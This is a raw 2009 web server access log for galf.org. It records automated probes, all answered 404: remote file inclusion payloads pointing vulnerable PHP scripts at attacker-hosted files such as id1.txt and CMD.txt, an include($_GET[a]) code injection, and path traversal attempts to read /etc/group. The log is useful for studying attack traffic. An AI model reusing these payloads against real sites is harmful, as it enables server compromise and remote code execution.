196.40.83.71 - - [20/Dec/2009:23:54:34 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:54:34 -0800] "GET /logs//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:47 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:47 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:47 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:54 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:54 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:54 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:55:00 -0800] "GET /index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:55:00 -0800] "GET /logs/index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:55:00 -0800] "GET /logs/access_090706.log/index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:55:39 -0800] "GET /logs/access_090525.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:55:39 -0800] "GET /logs/access_090706.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:55:47 -0800] "GET /index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:55:47 -0800] "GET /logs/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:55:47 -0800] "GET /logs/access_090803.log%20%20/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:55:47 -0800] "GET /logs/access_090831.log%20%20/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:55:49 -0800] "GET /logs/access_090629.log%20%20/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:55:52 -0800] "GET /logs/access_090629.log%20%20/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:55:54 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:55:54 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:55:54 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:00 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:00 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:00 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:01 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:01 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:01 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:01 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:02 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:02 -0800] "GET /logs/access_090803.log%20%20///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:02 -0800] "GET /logs///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:04 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:13 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:13 -0800] "GET /logs///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:13 -0800] "GET /logs/access_090803.log%20%20///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:16 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:18 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:20 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:25 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:27 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:29 -0800] "GET //modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:29 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:29 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:56:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:34 -0800] "GET /logs/access_091130.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:35 -0800] "GET /logs///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:35 -0800] "GET /logs/access_090803.log%20%20///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:35 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:37 -0800] "GET /logs/access_091130.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:56:39 -0800] "GET /logs/access_091130.log%20%20///modules/xfsection/modify.php?dir_module=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:23:56:58 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:23:56:58 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:27 -0800] "GET /logs/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:27 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:27 -0800] "GET /logs/access_090831.log%20%20/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:34 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:44 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:44 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:57:44 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:58:08 -0800] "GET /logs/access_090914.log%20%20/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:58:08 -0800] "GET /logs/index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:58:08 -0800] "GET /logs/access_090831.log%20%20/index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:58:08 -0800] "GET /index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:23:58:08 -0800] "GET /logs/access_090803.log%20%20/index2.php?x=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:58:10 -0800] "GET /logs/access_090914.log%20%20/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:28 -0800] "GET /logs/access_090706.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:58:52 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:58:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:58:52 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:52 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:54 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:54 -0800] "GET /logs/access_090706.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:58:59 -0800] "GET /logs/access_090706.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:00 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:00 -0800] "GET /logs/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:00 -0800] "GET /logs/access_090831.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:59:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [20/Dec/2009:23:59:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:02 -0800] "GET /logs/access_090914.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:09 -0800] "GET /logs/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:09 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:09 -0800] "GET /logs/access_090831.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:13 -0800] "GET /logs/access_090914.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:39 -0800] "GET /logs/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:39 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:40 -0800] "GET /logs/access_090831.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:59:49 -0800] "GET /logs/access_090608.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:00:16 -0800] "GET /logs/access_090525.log///akocomments.php?mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:00:00:28 -0800] "GET /mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:00:00:28 -0800] "GET /logs/access_090831.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:00:00:28 -0800] "GET /logs/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:00:00:33 -0800] "GET /logs/access_090608.log/mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:00:02:10 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:00:02:10 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:02:20 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:36 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:37 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:37 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:51 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:51 -0800] "GET /logs/access_091123.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:51 -0800] "GET /logs/access_090914.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs/access_091123.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs/access_091123.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs/access_090914.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:02:53 -0800] "GET /logs/access_090914.log///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
